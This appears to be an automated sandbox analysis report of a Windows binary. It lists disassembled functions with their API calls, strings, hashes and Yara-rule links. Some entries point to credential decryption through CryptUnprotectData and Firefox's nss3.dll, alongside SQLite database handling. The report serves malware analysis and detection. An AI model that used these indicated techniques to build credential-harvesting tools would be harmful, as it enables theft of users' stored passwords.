                                                  Function 00403853, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                  • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: CryptUnprotectData$crypt32.dll
                                                  • API String ID: 145871493-1827663648
                                                  • Opcode ID: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                  • Instruction ID: e5a88ed766aaa6e52f35248584035ac6595561cae6bd6684aeb1aa38a92ec81b
                                                  • Opcode Fuzzy Hash: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                  • Instruction Fuzzy Hash: 0A011A32500611ABC6219F158C4881BFEEAEBA1B42724887FF1C5E2660C3748A80CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411DB2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcscpy.MSVCRT ref: 00411DC1
                                                  • wcscpy.MSVCRT ref: 00411DDC
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040D8DB,00000000,?,0040D8DB,?,General,?), ref: 00411E03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 00411E0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                  • String ID: General
                                                  • API String ID: 999786162-26480598
                                                  • Opcode ID: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                  • Instruction ID: 9a0facac0be4658f1d28dd1d6e0b9c096870c14066d41f215ae7e32982aabb00
                                                  • Opcode Fuzzy Hash: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                  • Instruction Fuzzy Hash: 9AF024B2508301BFF3109B90AC85EAF769CDB10799F20842FF20591061DA396D50825D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004071BD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                  • _snwprintf.MSVCRT ref: 004071FE
                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastMessage_snwprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 313946961-1552265934
                                                  • Opcode ID: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                  • Instruction ID: 3b05860ebe56c522f2c5ab20428fa68284bb982c16b5ab54bfd07cc8ba07ffa8
                                                  • Opcode Fuzzy Hash: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                  • Instruction Fuzzy Hash: 74F0E23680021867DB11AB94CC02FDA72ACBB54B82F0400AAB905F2180EAF4EB404A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412455, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,004048E6,00000000), ref: 0041245E
                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                  • FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 145871493-1506664499
                                                  • Opcode ID: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                  • Instruction ID: b7e45597e31c4a606350929a185ef34a25fe7475720eeaf8429eabe2a59cceae
                                                  • Opcode Fuzzy Hash: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                  • Instruction Fuzzy Hash: 6BD05B393502206BA7116F35BC48EAF2E65EFC6F537150031F501D1260CB544E429669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0043310B, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foreign key constraint failed$new$oid$old
                                                  • API String ID: 0-1953309616
                                                  • Opcode ID: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                  • Instruction ID: 956c7fa9d19c0f39a897be9568c0d7cc0038550a6314a583777b8070e5951de7
                                                  • Opcode Fuzzy Hash: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                  • Instruction Fuzzy Hash: 90E18F71E00208EFDF14DFA5D881AAEBBB5FF48304F14846EE805AB251DB79AE41CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0042EDD2, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • foreign key on %s should reference only one column of table %T, xrefs: 0042EE2E
                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042EE56
                                                  • unknown column "%s" in foreign key definition, xrefs: 0042EFB9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                  • API String ID: 3510742995-272990098
                                                  • Opcode ID: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                  • Instruction ID: 495bb5eb18a6352e4e4c54452741b55d9a16d19d8a312fbbfa639f366bc90293
                                                  • Opcode Fuzzy Hash: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                  • Instruction Fuzzy Hash: 72914C71A0021ADFCB10CF5AD580A9EBBF1FF58314B55856AE809AB302D735E945CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004063C1, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcslen$wcscatwcscpy
                                                  • String ID: nss3.dll
                                                  • API String ID: 1250441359-2492180550
                                                  • Opcode ID: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                  • Instruction ID: 7e6fc29c8000acf8dfdc2cef167c58109b3e52db234c734628f4c22aee9d38d0
                                                  • Opcode Fuzzy Hash: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                  • Instruction Fuzzy Hash: E711ECB2D0421DAADB10E750DD45BCA73EC9F10314F1004B7F60CE20C2F778AA548A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AE21, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE3C
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE4F
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE62
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE75
                                                  • free.MSVCRT(00000000), ref: 0040AEAE
                                                    • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@$free
                                                  • String ID:
                                                  • API String ID: 2241099983-0
                                                  • Opcode ID: 0b66915f84970c8dee2b815cea6b5dfc4349602c711738901fa1bf88fce7501e
                                                  • Instruction ID: 5cedf5899733f7fd452d28a3e5974aab2a3b061775a7969347507653aae84efd
                                                  • Opcode Fuzzy Hash: 0b66915f84970c8dee2b815cea6b5dfc4349602c711738901fa1bf88fce7501e
                                                  • Instruction Fuzzy Hash: 13010832946A20ABC6367B2AD50251FB368BE91B90306457FF445BB3818F3C7C5186DF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414CBE, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00414CC6
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00414CE6
                                                  • malloc.MSVCRT ref: 00414CEC
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00414D0A
                                                  • free.MSVCRT(?), ref: 00414D13
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                  • String ID:
                                                  • API String ID: 4053608372-0
                                                  • Opcode ID: 7aaa167120dddf07ba2af9e079abf54c4ac6044bb501c5d34657e102407f57a5
                                                  • Instruction ID: 44ea64674f021cea2031e16b60495934b5371f4db2927085d3abb6a650cf4446
                                                  • Opcode Fuzzy Hash: 7aaa167120dddf07ba2af9e079abf54c4ac6044bb501c5d34657e102407f57a5
                                                  • Instruction Fuzzy Hash: 6601F4B140011DBEAF115FA9DCC5CAF7EACDA457E8720036AF810E2190E6344E4056B8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A302, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 0040A314
                                                  • GetWindowRect.USER32 ref: 0040A321
                                                  • GetClientRect.USER32 ref: 0040A32C
                                                  • MapWindowPoints.USER32 ref: 0040A33C
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040A358
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                  • Instruction ID: 816d64d46c4b910dad83cc5cff1f19606824cbaca0e9d5d20ff5cebd8420fa85
                                                  • Opcode Fuzzy Hash: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                  • Instruction Fuzzy Hash: 06014836800129BBDB11AFA59C49EFFBFBCFF46B15F044169F901A2190D77896028BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004421EB, Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,00410671,?,?), ref: 00442202
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00442216
                                                  • memset.MSVCRT ref: 00442225
                                                    • Part of subcall function 00407B93: ReadFile.KERNEL32(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00442248
                                                    • Part of subcall function 00441FDC: memchr.MSVCRT ref: 00442017
                                                    • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420BB
                                                    • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420CD
                                                    • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420F5
                                                  • CloseHandle.KERNEL32(00000000), ref: 0044224F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                  • String ID:
                                                  • API String ID: 1471605966-0
                                                  • Opcode ID: 3fb3a795f412c9ef8ba02b3b663898961b1c6dbae64b6d36bd5d494f69bd21b5
                                                  • Instruction ID: 5cd116c641245c85bcd5bad65d9d69835b0888748ca48550e443bbafd66aa86b
                                                  • Opcode Fuzzy Hash: 3fb3a795f412c9ef8ba02b3b663898961b1c6dbae64b6d36bd5d494f69bd21b5
                                                  • Instruction Fuzzy Hash: 3DF0FC325041007AE21077329D4AF6B7B9CDF85761F10053FF515911D2EA789904C179
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040ADBB, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: bb5b54d35ac9345d4f67fd1f43b9bd0339cc6982e71662365849d1d3c181b2be
                                                  • Instruction ID: 7485fa72425b52f9fdb5b203d173836123891f19866e380edd82503d68adac07
                                                  • Opcode Fuzzy Hash: bb5b54d35ac9345d4f67fd1f43b9bd0339cc6982e71662365849d1d3c181b2be
                                                  • Instruction Fuzzy Hash: D8F0FF72509701AFD720AF6999D991BB7F9BF943147A0493FF049D3A41CB78A8904A18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C35B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C37F
                                                  • memset.MSVCRT ref: 0040C396
                                                    • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                    • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                  • _snwprintf.MSVCRT ref: 0040C3C5
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                  • String ID: </%s>
                                                  • API String ID: 168708657-259020660
                                                  • Opcode ID: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                  • Instruction ID: 40532074a48dce177473b235f1db1661615fe75cb863f0afecc7fe9ed9b88556
                                                  • Opcode Fuzzy Hash: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                  • Instruction Fuzzy Hash: 910136F3D4012976EB20A755DC45FEE76BCEF45308F4000B6BB09B7181DB78AA458AA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A414, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                  • String ID: caption
                                                  • API String ID: 1523050162-4135340389
                                                  • Opcode ID: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                  • Instruction ID: f5bb4e3483ddd063dbb45333af41605001ac6cd66b5ccbc099165aa82e617e5a
                                                  • Opcode Fuzzy Hash: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                  • Instruction Fuzzy Hash: 44F0C83690031466FB20EB51DD4EB9A3768AB04755F5000B6FF04B61D2DBF89E50CBAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040103E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004075AD: memset.MSVCRT ref: 004075B7
                                                    • Part of subcall function 004075AD: wcscpy.MSVCRT ref: 004075F7
                                                  • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                  • SendDlgItemMessageW.USER32 ref: 0040107C
                                                  • SendDlgItemMessageW.USER32 ref: 0040109A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 210187428-168460110
                                                  • Opcode ID: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                  • Instruction ID: b86dbe1d582a7894089203107e7a1e4413fc3d6f7e8de8594febed0b37e93160
                                                  • Opcode Fuzzy Hash: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                  • Instruction Fuzzy Hash: 56F05E75A4030877E621ABA0DC06F8A7BB9B740B01F000935B711B51E0D7E4A285C658
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004076CD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassName_wcsicmpmemset
                                                  • String ID: edit
                                                  • API String ID: 2747424523-2167791130
                                                  • Opcode ID: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                  • Instruction ID: 51a03c7d5923a90201923a44b10f324a390683a0d3b2f84b2934c4bf373e0ab9
                                                  • Opcode Fuzzy Hash: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                  • Instruction Fuzzy Hash: A9E04872D8031E7AFB14ABA0DC4BFA977BCBB04704F5001F5B615E10D2EBB4A6454A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004121C3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                  • API String ID: 2574300362-880857682
                                                  • Opcode ID: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                  • Instruction ID: 4b50289c71ca44835333f785f02b611be4b8370b72da6f54bb0e40a9521e89f3
                                                  • Opcode Fuzzy Hash: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                  • Instruction Fuzzy Hash: 86D0C774600313BADB108F209D48B4239746712743F251036F430D1771DF7895C49A1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041B0C3, Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memcmp
                                                  • String ID:
                                                  • API String ID: 3384217055-0
                                                  • Opcode ID: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                  • Instruction ID: 295c5a0bc2866328f8dcc37ada2a4d99e769f04d629d2bea2717987aff5dfa66
                                                  • Opcode Fuzzy Hash: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                  • Instruction Fuzzy Hash: 01217C72E10248BBDB18DAA5DC56E9F73ECEB44740F50042AB512D7281EB78E644C765
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E5BA, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                  • Instruction ID: 5db9a22820b402d4d4dd4a010236648e296a7231ae54e5ee969484aed16c8927
                                                  • Opcode Fuzzy Hash: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                  • Instruction Fuzzy Hash: D301F0B174070077D335AA35CC03F1A73E49FA1714F400E1DF152666C2D7F8A105866D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415494, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004154B8
                                                  • memset.MSVCRT ref: 004154E8
                                                    • Part of subcall function 0041538D: memset.MSVCRT ref: 004153AA
                                                    • Part of subcall function 0041538D: UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                    • Part of subcall function 00414EFE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F2A
                                                    • Part of subcall function 00414EFE: SetEndOfFile.KERNEL32(?), ref: 00414F54
                                                    • Part of subcall function 00414EFE: GetLastError.KERNEL32 ref: 00414F5E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$File$ErrorLastUnlockUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: %s-shm$,A
                                                  • API String ID: 1271386063-2158068007
                                                  • Opcode ID: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
                                                  • Instruction ID: 8012e8fd2c705de7aa363bc2bd32bd15ad04531b7aa24a5a7ab2fd91cc4b7507
                                                  • Opcode Fuzzy Hash: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
                                                  • Instruction Fuzzy Hash: B1510671504B05FFD710AF21DC02BDB77A6AF80754F10481FF9299A282EBB9E5908B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415804, Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004158E7
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 00415912
                                                  • GetLastError.KERNEL32 ref: 00415939
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041594F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                  • String ID:
                                                  • API String ID: 1661045500-0
                                                  • Opcode ID: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                  • Instruction ID: 02e61587b06ba7d058713df3830c0e33945dcb010177779d6ae1e8dc7ea6695b
                                                  • Opcode Fuzzy Hash: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                  • Instruction Fuzzy Hash: B6518EB4214B02DFD724DF25C981AA7B7E9FB84315F10492FE88286651E734E854CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0042C345, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004132EA: memset.MSVCRT ref: 00413304
                                                  • memcpy.MSVCRT ref: 0042C42D
                                                  Strings
                                                  • virtual tables may not be altered, xrefs: 0042C384
                                                  • Cannot add a column to a view, xrefs: 0042C39A
                                                  • sqlite_altertab_%s, xrefs: 0042C3FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                  • API String ID: 1297977491-2063813899
                                                  • Opcode ID: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                  • Instruction ID: 3e8a37011c5d834ac6e6d4f8fd11fd3d4e87e0ccd438cada7bf19ffd6667b676
                                                  • Opcode Fuzzy Hash: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                  • Instruction Fuzzy Hash: 03419D71A00615AFDB10DF69D881A5EB7F0FF08314F24856BE8489B352D778EA51CB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0042E398, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: $, $CREATE TABLE
                                                  • API String ID: 3510742995-3459038510
                                                  • Opcode ID: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                  • Instruction ID: 75c0c8dac0447bb43292008ef446c40d7ab48a9469891862f1914eead86e2b05
                                                  • Opcode Fuzzy Hash: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                  • Instruction Fuzzy Hash: C3518171E00219DFCF10DF9AD4856AEB7B5FF44309F64809BE841AB205D778AA45CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040475A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004047A1
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
